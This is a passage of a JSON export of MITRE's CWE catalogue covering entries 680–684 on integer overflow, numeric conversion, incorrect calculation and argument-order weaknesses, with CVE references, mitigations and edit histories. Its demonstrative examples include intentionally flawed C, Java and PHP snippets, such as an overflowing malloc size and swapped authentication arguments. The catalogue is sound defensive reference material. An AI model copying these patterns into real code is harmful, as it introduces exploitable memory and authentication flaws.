Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"680":{"attr":{"@_ID":"680","@_Name":"Integer Overflow to Buffer Overflow","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"190","@_View_ID":"709","@_Chain_ID":"680"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"}]}},"681":{"attr":{"@_ID":"681","@_Name":"Incorrect Conversion between Numeric Types","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"682","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Unexpected State","Quality Degradation"],"Note":"The program could wind up using the wrong number and generate incorrect results. If the number is used to allocate resources or make a security decision, then this could introduce a vulnerability."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid making conversion between numeric types. Always check for the allowed ranges."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example, a float literal is cast to an integer, thus causing a loss of precision.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"int i = (int) 33457.8f;"}},{"Intro_Text":"This code adds a float and an integer together, casting the result to an integer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$floatVal = 1.8345;$intVal = 3;$result = (int)$floatVal + $intVal;","xhtml:br":["",""]}},"Body_Text":"Normally, PHP will preserve the precision of this operation, making $result = 4.8345. After the cast to int, it is reasonable to expect PHP to follow rounding convention and set $result = 5. However, the explicit cast to int always rounds DOWN, so the final value of $result is 4. This behavior may have unintended consequences."},{"attr":{"@_Demonstrative_Example_ID":"DX-73"},"Intro_Text":"In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...if (result == ERROR)amount = -1;...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-74"},"Intro_Text":"In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...amount = accessmainframe();...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2007-4988","Description":"Chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988"},{"Reference":"CVE-2009-0231","Description":"Integer truncation of length value leads to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231"},{"Reference":"CVE-2008-3282","Description":"Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP34-C","Entry_Name":"Ensure that floating point conversions are within range of the new type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT15-C","Entry_Name":"Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT35-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM12-J","Entry_Name":"Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-681"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-681"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Observed_Examples, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"682":{"attr":{"@_ID":"682","@_Name":"Incorrect Calculation","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs a calculation that generates incorrect or unintended results that are later used in security-critical decisions or resource management.","Extended_Description":"When software performs a security-critical calculation incorrectly, it might lead to incorrect resource allocations, incorrect privilege assignments, or failed comparisons among other things. Many of the direct results of an incorrect calculation can lead to even larger problems such as failed protection mechanisms or even arbitrary code execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"170","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the incorrect calculation causes the program to move into an unexpected state, it may lead to a crash or impairment of service."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands"],"Note":"If the incorrect calculation is used in the context of resource allocation, it could lead to an out-of-bounds operation (CWE-119) leading to a crash or even arbitrary code execution. Alternatively, it may result in an integer overflow (CWE-190) and / or a resource consumption problem (CWE-400)."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"In the context of privilege or permissions assignment, an incorrect calculation can provide an attacker with access to sensitive resources."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If the incorrect calculation leads to an insufficient comparison (CWE-697), it may compromise a protection mechanism such as a validation routine and allow an attacker to bypass the security-critical code."}]},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Understand your programming language\'s underlying representation and how it interacts with numeric calculation. Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how your language handles numbers that are too large or too small for its underlying representation."},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range."},{"Phase":"Implementation","Description":"Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity."},{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":{"xhtml:p":["Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++)."]}},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++)."]}},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"Intro_Text":"This code attempts to calculate a football team\'s average number of yards gained per touchdown.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...int touchdowns = team.getTouchdowns();int yardsGained = team.getTotalYardage();System.out.println(team.getName() + \\" averages \\" + yardsGained / touchdowns + \\"yards gained for every touchdown scored\\");...","xhtml:br":["","","",""]}},"Body_Text":"The code does not consider the event that the team they are querying has not scored a touchdown, but has gained yardage. In that case, we should expect an ArithmeticException to be thrown by the JVM. This could lead to a loss of availability if our error handling code is not set up correctly."},{"attr":{"@_Demonstrative_Example_ID":"DX-55"},"Intro_Text":"This example attempts to calculate the position of the second byte of a pointer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *p = x;char * second_char = (char *)(p + 1);","xhtml:br":""}},"Body_Text":"In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-0022","Description":"chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022"},{"Reference":"CVE-2004-1363","Description":"substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP32-C","Entry_Name":"Prevent or detect domain and range errors in math functions","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT07-C","Entry_Name":"Use only explicitly signed or unsigned char type for numeric values"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT13-C","Entry_Name":"Use bitwise operators only on unsigned operands"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT33-C","Entry_Name":"Ensure that division and remainder operations do not result in divide-by-zero errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT34-C","Entry_Name":"Do not shift an expression by a negative number of bits or by greater than or equal  to the number of bits that exist in the operand","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"128"}},{"attr":{"@_CAPEC_ID":"129"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Signed Integer Boundaries&#34;, Page 220"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"683":{"attr":{"@_ID":"683","@_Name":"Function Call With Incorrect Order of Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses.","Extended_Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers or types of arguments, such as format strings in C. It also can occur in languages or environments that do not enforce strong typing.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use the function, procedure, or routine as specified."},{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-62"},"Intro_Text":"The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username, $password) {}authenticate($_POST[\'password\'], $_POST[\'username\']);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// authenticate user"}},"xhtml:br":["",""]}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-7049","Description":"Application calls functions with arguments in the wrong order, allowing attacker to bypass intended access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"684":{"attr":{"@_ID":"684","@_Name":"Incorrect Provision of Specified Functionality","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not function according to its published specifications, potentially 